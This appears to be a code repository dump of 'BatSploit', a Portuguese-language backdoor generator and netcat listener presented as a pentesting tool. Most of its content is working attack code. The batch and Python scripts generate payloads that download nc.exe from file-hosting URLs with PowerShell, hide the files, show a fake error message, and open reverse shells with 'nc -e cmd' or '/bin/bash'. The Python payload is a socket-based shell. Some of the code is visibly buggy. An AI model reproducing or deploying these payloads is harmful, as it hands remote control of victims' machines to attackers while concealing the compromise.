├── BatSploit_1.0 ├── BatSploit.bat ├── BatSploit.py ├── exploits │ ├── default_fud_backdoor.txt │ └── test.txt └── output │ └── null ├── README.md ├── batsploit.py ├── core.py ├── handler.py ├── nc.exe └── setup.py /BatSploit_1.0/BatSploit.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | goto in 3 | :in 4 | mode 79,20 5 | color b0 6 | cls 7 | echo. 8 | echo XXXXXXXXXXXXXXXXXXXXXXXXX 9 | echo Bem-vindo(a) ao BatSploit 10 | echo XXXXXXXXXXXXXXXXXXXXXXXXX 11 | echo coder : ProXy 12 | echo. 13 | echo [bd_bat] Backdoor using NetCat no instalation required 14 | echo [mt_handler] Handler to listen connection, instalation required NetCat 15 | echo. 16 | set /p opt=batSploit : 17 | if '%opt%'== 'bd_bat' goto bd 18 | if '%opt%'== 'mt_handler' goto hd 19 | goto e1 20 | :e1 21 | echo. 22 | echo This option doesnt exists pls select other 23 | ping localhost -n 3 > null 24 | attrib +s +h null 25 | goto in 26 | :bd 27 | set /p name=batSploit [1] FileName : 28 | echo. 29 | echo Generating Backdoor Wait One Moment 30 | echo. 31 | cd exploits 32 | msg * ALTERRE YOUR_IP E YOUR_PORT 33 | start default_fud_backdoor.txt 34 | pause 35 | copy default_fud_backdoor.txt %name%.bat 36 | move %name%.bat ../output/%name%.bat 37 | copy test.txt default_fud_backdoor.txt 38 | echo. 39 | echo Backdoor was created 40 | cd .. 41 | ping localhost -n 5 > null 42 | goto in 43 | :hd 44 | echo. 45 | set /p per=Voce tem NetCat baixado [S/N] ? 46 | if '%per%'=='N' goto n 47 | if '%per%'=='S' goto s 48 | goto e2 49 | e2: 50 | echo. 51 | echo This command doesnt exists 52 | goto 2 53 | :n 54 | echo. 55 | echo Downloading netcat ... 56 | powershell (New-Object System.Net.WebClient).DownloadFile('http://download1979.mediafire.com/ytti8lezd61g/plfm7t2nar12hdb/nc.exe', 'nc.exe') 57 | echo. 58 | echo Downloading Completed 59 | echo. 60 | set /p port=batSploit [2] Port : 61 | echo Handller Started 62 | start nc -nvlp %port% 63 | :s 64 | echo. 
65 | set /p port=batSploit [2] Port : 66 | echo Handller Started 67 | start nc -nvlp %port% 68 | -------------------------------------------------------------------------------- /BatSploit_1.0/BatSploit.py: -------------------------------------------------------------------------------- 1 | #Author : Daniel Victor Freire Feitosa 2 | #Version : 1.1.0 3 | #!/usr/bin/python 4 | import os 5 | 6 | def banner(): 7 | os.system("cls") # if windows 8 | #os.system("ls") # if linux 9 | print "" 10 | print " /$$$$$$$ /$$ /$$$$$$ /$$ /$$ /$$" 11 | print " | $$__ $$ | $$ /$$__ $$ | $$ |__/ | $$" 12 | print " | $$ \ $$ /$$$$$$ /$$$$$$ | $$ \__/ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$" 13 | print " | $$$$$$$ |____ $$|_ $$_/ | $$$$$$ /$$__ $$| $$ /$$__ $$| $$|_ $$_/" 14 | print " | $$__ $$ /$$$$$$$ | $$ \____ $$| $$ \ $$| $$| $$ \ $$| $$ | $$ " 15 | print " | $$ \ $$ /$$__ $$ | $$ /$$ /$$ \ $$| $$ | $$| $$| $$ | $$| $$ | $$ /$$" 16 | print " | $$$$$$$/| $$$$$$$ | $$$$/| $$$$$$/| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/" 17 | print " |_______/ \_______/ \___/ \______/ | $$____/ |__/ \______/ |__/ \___/ " 18 | print " | $$ " 19 | print " | $$ " 20 | print " |__/ " 21 | print "" 22 | print " CODER : Daniel Victor Freire Feitosa | @DanielFreire00 | ProXySec " 23 | print "" 24 | print "Payloads List\r\n" 25 | print "===============================================================================" 26 | print "NetCat Windows Reverse Shell : windows/bd_netcat/reverse_shell\r\n" 27 | print "NetCat Linux Reverse Shell : linux/bd_netcat/reverse_shell\r\n" 28 | print "Python Reverse Shell : python/reverse_shell\r\n" 29 | print "" 30 | print "" 31 | 32 | def backdoor_netcat_windows(nc, host, port, name): 33 | bd = "color 7f && mode 20, 10\r\n" 34 | bd += "cd %TEMP%\r\n" 35 | bd += "echo powershell(new-object system.net.webclient).downloadfile('"+nc+"', 'nc.exe') >> bd.bat\r\n" 36 | bd += "echo attrib +s +h nc.exe >> bd.bat\r\n" 37 | bd += "echo nc " + host + " " + port + " -e cmd >> bd.bat\r\n" 38 | bd += 
"attrib +s +h bd.bat\r\n" 39 | bd += "powershell -W hidden ./bd.bat" 40 | arquivo = open(name + ".bat", "w") 41 | arquivo.write(bd) 42 | 43 | def backdoor_netcat_linux(host, port, name): 44 | bd = "echo nc "+host+" "+port+" -e /bin/bash > bd.sh" 45 | bd += "sh bd.sh & dismown && clear &> dev/null" 46 | bd += "clear" 47 | arquivo = open(name + ".sh", "w") 48 | arquivo.write(bd) 49 | 50 | def backdoor_python(host, port, name): 51 | bd = "import socket, os\r" 52 | bd += "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r" 53 | bd += "s.connect(('"+host+"', "+port+"))\r" 54 | bd += "QD=True\r" 55 | bd += "while not QD:\r" 56 | bd += " data = s.recv(1024)\r" 57 | bd += " if len(data)==0:\r" 58 | bd += " QD=True\r" 59 | bd += " a,b,c,=os.popen3(data)\r" 60 | bd += " b_value=b.read()+c.read()\r" 61 | bd += " s.send(b_value)" 62 | arquivo = open(name + ".py", "w") 63 | arquivo.write(bd) 64 | 65 | 66 | def run(): 67 | banner() 68 | cmd = raw_input("BatSploit Console _> ") 69 | if cmd == "payload windows/bd_netcat/reverse_shell": 70 | print "" 71 | print "NetCat Windows Reverse Shell" 72 | print "" 73 | nc_link = raw_input("NetCat Link Download _> ") 74 | if nc_link == "default": 75 | nc = "https://fs08n2.sendspace.com/dl/9140e71679f37b4c756ca6fcab9ff626/596eb3224bcb6aa7/3ajt22/nc.exe" 76 | #nc = "http://192.168.0.101/nc.exe" 77 | else: 78 | nc = nc_link 79 | host = raw_input("LHOST _> ") 80 | port = raw_input("LPORT _> ") 81 | name = raw_input("Name of backdoor _> ") 82 | try: 83 | print "" 84 | print "Criando Backdoor" 85 | backdoor_netcat_windows(nc, host, port, name) 86 | print "Backdoor Criada : " + name + ".bat" 87 | except: 88 | print "Algo deu errado..." 
89 | elif cmd == "payload linux/bd_netcat/reverse_shell": 90 | print "" 91 | print "NetCat Linux Reverse Shell" 92 | print "" 93 | host = raw_input("LHOST _> ") 94 | port = raw_input("LPORT _> ") 95 | name = raw_input("Name of backdoor _> ") 96 | try: 97 | print "" 98 | print "Criando Backdoor" 99 | backdoor_netcat_linux(nc, host, port, name) 100 | print "Backdoor Criada : " + name + ".sh" 101 | 102 | except: 103 | print "Algo deu errado..." 104 | elif cmd == "payload python/reverse_shell": 105 | print "" 106 | print "Python Reverse Shell" 107 | print "" 108 | host = raw_input("LHOST _> ") 109 | port = raw_input("LPORT _> ") 110 | name = raw_input("Name of backdoor _> ") 111 | try: 112 | print "" 113 | print "Criando Backdoor" 114 | backdoor_python(host, port, name) 115 | print "Backdoor Criada : " + name + ".py" 116 | except: 117 | print "Algo deu errado..." 118 | 119 | run() 120 | -------------------------------------------------------------------------------- /BatSploit_1.0/exploits/default_fud_backdoor.txt: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo powershell (New-Object System.Net.WebClient).DownloadFile('http://download1979.mediafire.com/ytti8lezd61g/plfm7t2nar12hdb/nc.exe', 'nc.exe') > myCode.bat 3 | echo attrib +s +h nc.exe >> myCode.bat 4 | echo nc YOUR_IP YOUR_PORT -e cmd.exe >> myCode.bat 5 | attrib +s +h myCode.bat 6 | msg * Error 0xF85961846632 7 | powershell -WindowStyle Hidden ./myCode.bat 8 | -------------------------------------------------------------------------------- /BatSploit_1.0/exploits/test.txt: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo powershell (New-Object System.Net.WebClient).DownloadFile('http://download1979.mediafire.com/ytti8lezd61g/plfm7t2nar12hdb/nc.exe', 'nc.exe') > myCode.bat 3 | echo attrib +s +h nc.exe >> myCode.bat 4 | echo nc YOUR_IP YOUR_PORT -e cmd.exe >> myCode.bat 5 | attrib +s +h myCode.bat 6 | 
msg * Error 0xF85961846632 7 | powershell -WindowStyle Hidden ./myCode.bat 8 | -------------------------------------------------------------------------------- /BatSploit_1.0/output/null: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BatSploit 2 |
3 |

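Projeto open-source para pentesters; contém um gerador de payloads FUD (Fully Undetectable) e um handler de escuta. Os scripts gerados baixam o nc.exe via PowerShell (System.Net.WebClient), ocultam os arquivos com `attrib +s +h` e executam `nc ... -e cmd`, comportamentos que ficam visíveis na linha de comando dos processos criados e no tráfego de rede.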

4 | 5 | # Instalação 6 |

user@user:~# python setup.py

7 | 8 | # Informações Adicionais 9 |